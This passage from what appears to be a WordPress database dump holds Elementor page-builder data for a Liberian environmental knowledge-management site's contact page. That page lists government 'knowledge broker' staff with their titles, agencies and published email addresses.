\\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23449,3410,'_elementor_edit_mode','builder'),(23450,3410,'_elementor_template_type','wp-page'),(23451,3410,'_elementor_version','3.0.16'),(23452,3410,'_wp_page_template','default'),(23453,3410,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your 